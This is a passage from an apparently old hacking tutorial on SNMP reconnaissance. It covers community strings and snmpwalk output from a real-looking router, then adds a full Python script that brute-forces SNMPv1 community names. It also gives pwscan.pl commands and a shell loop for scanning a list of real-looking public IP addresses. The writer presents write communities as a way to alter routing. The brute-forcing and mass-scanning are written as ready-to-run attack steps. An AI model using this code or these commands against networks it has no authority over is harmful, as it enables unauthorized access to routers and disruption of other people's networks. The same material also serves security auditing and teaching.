SNMP is short for Simple Network Management Protocol and it does just that -
it is used to monitor and manage hosts and routers. Most people use SNMP to
monitor routers - to graph bandwidth utilisation and to have the router send a
trap to the SNMP management station when a link goes down. The best-known SNMP
management station is HP OpenView. Attackers use SNMP to map networks and,
given a write community, to change or disrupt the routing itself. SNMP agents
on hosts (especially NT workstations) are fun - they reveal a lot of
interesting information.
SNMP uses a community name for access control - in effect a shared password.
If you don't have the right community name you cannot get information from
the host or router, and an SNMPv1 agent simply drops your request without
replying. The easiest way of checking whether a community name is valid is
the snmpwalk command (it is bundled with the ucd-snmp package):
> snmpwalk 196.35.xxx.79 xmax
system.sysDescr.0 = Cisco Internetwork Operating System Software
IOS (tm) 3000 Software (CPA25-CG-L), Version 11.0(6), RELEASE SOFTWARE (fc1)
Copyright (c) 1986-1996 by cisco Systems, Inc.
Compiled Thu 21-Mar-96 00:29 by hochan
system.sysObjectID.0 = OID: enterprises.9.1.57
---blah blah---
One can see in the above example that "xmax" is a valid community name.
There are actually two sorts of community string - a "read" (read-only) string
and a "write" (read-write) string. With the write string you can change
information on the host or the router - routing tables, the IP addresses
assigned to interfaces and so on; with a read string you can only fetch
information. Either string travels in cleartext in every packet, so anyone
sniffing the segment between you and the router learns it. SNMP runs over UDP
(port 161), so if you are scanning from behind your own firewall make sure the
UDP replies are allowed back in - otherwise every community name will look
invalid.
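For those who want to see exactly what snmpwalk puts on the wire for that first
check, here is a small Python script - added here, not part of the original
write-up or of the ucd-snmp tools. It hand-encodes the SNMPv1 GetRequest for
system.sysDescr.0 in BER, sends it to UDP port 161 and tries a list of
candidate community names in turn, which is the same test pwscan.pl automates
below. The names ber_len, tlv, ber_int, ber_oid, build_get_request,
parse_response and check_community are this example's own; the 192.0.2.10
target and the three-name list at the bottom are placeholders.

```python
#!/usr/bin/env python3
# SNMPv1 community-name checker with hand-rolled BER (added example, not from the page).
# Builds the GetRequest for system.sysDescr.0 that snmpwalk starts with, sends it to
# UDP/161 and treats any GetResponse as proof that the community name is valid.
import socket

SYS_DESCR_0 = (1, 3, 6, 1, 2, 1, 1, 1, 0)   # system.sysDescr.0

def ber_len(n):
    """BER length: short form below 128, long form (0x80 | byte count, then bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag, body):
    return bytes([tag]) + ber_len(len(body)) + body

def ber_int(v):
    """INTEGER, minimal two's-complement encoding (we only send non-negative values)."""
    return tlv(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big", signed=True))

def ber_oid(oid):
    """OBJECT IDENTIFIER: first two arcs share a byte, the rest are base-128 with continuation bits."""
    out = [40 * oid[0] + oid[1]]
    for arc in oid[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(chunk)
    return tlv(0x06, bytes(out))

def build_get_request(community, oid=SYS_DESCR_0, request_id=1):
    """SNMPv1 message: version 0, community as a cleartext OCTET STRING, GetRequest PDU (0xA0)."""
    varbind = tlv(0x30, ber_oid(oid) + tlv(0x05, b""))        # OID with a NULL value
    pdu = tlv(0xA0, ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(0x30, varbind))
    return tlv(0x30, ber_int(0) + tlv(0x04, community.encode()) + pdu)

def _read_tlv(buf, pos):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                                          # long-form length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def parse_response(data):
    """(community, request_id, error_status, value) from an SNMPv1 GetResponse (PDU tag 0xA2)."""
    tag, msg, _ = _read_tlv(data, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, version, p = _read_tlv(msg, 0)
    if version != b"\x00":
        raise ValueError("not SNMPv1")
    _, community, p = _read_tlv(msg, p)
    tag, pdu, _ = _read_tlv(msg, p)
    if tag != 0xA2:
        raise ValueError("not a GetResponse")
    _, rid, p = _read_tlv(pdu, 0)
    _, err, p = _read_tlv(pdu, p)
    _, _, p = _read_tlv(pdu, p)                                # error-index, not needed here
    _, vbl, _ = _read_tlv(pdu, p)
    _, vb, _ = _read_tlv(vbl, 0)
    _, _, q = _read_tlv(vb, 0)                                 # the OID we asked for
    _, value, _ = _read_tlv(vb, q)
    return (community.decode("latin-1"), int.from_bytes(rid, "big", signed=True),
            int.from_bytes(err, "big", signed=True), value)

def check_community(host, community, timeout=2.0):
    """One probe: the sysDescr text if the agent answers without error, None otherwise."""
    request_id = 0x1234
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(build_get_request(community, request_id=request_id), (host, 161))
        data, _ = sock.recvfrom(4096)
    except socket.timeout:
        return None             # a v1 agent silently drops a wrong community: no reply at all
    finally:
        sock.close()
    try:
        _, rid, err, value = parse_response(data)
    except (ValueError, IndexError):
        return None
    if rid != request_id or err != 0:
        return None
    return value.decode("latin-1", "replace")

if __name__ == "__main__":
    # Placeholder target and wordlist; in practice feed it the page's community.db.
    for name in ["public", "private", "xmax"]:
        descr = check_community("192.0.2.10", name)
        if descr is not None:
            print(f"valid community {name!r}: {descr}")
            break
```

Two things to notice in the bytes: the community name is an ordinary OCTET
STRING right after the version field, which is why a sniffer recovers it, and a
wrong name produces no reply at all, so the only signal you get is the timeout.
Keep the timeout short when the list is long.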
Just like usernames and passwords, community names can also be brute forced.
Again we make use of VLAD's pwscan.pl Perl script. Populate the "community.db"
file with your candidate names and let rip:
perl pwscan.pl -v -M 196.35.xxx.79
Did I mention that you could use pwscan.pl to scan more than one IP number,
using simple scripting?
> cat > toscanips.txt
196.34.121.1
196.7.18.120
160.124.19.98
^D
> cat > goscan
#!/bin/tcsh
foreach a (`cat toscanips.txt`)
echo working on $a ...
perl pwscan.pl -v -M $a
continue
end
^D
> chmod u+x goscan
> ./goscan
working on 196.34.121.1 ...
--blah blah--
Real easy eh? A Windows program that provides an excellent "viewer" for SNMP
information is SolarWinds' IP browser (get it at http://www.solarwinds.net/) -
it tries to perform an SNMP walk of every pingable machine in a network. It is
not a freeware application, but it is really good. Another nice feature is that
you can supply your own community strings, and you can edit the information if
the string allows you to update it - i.e. a "write" string.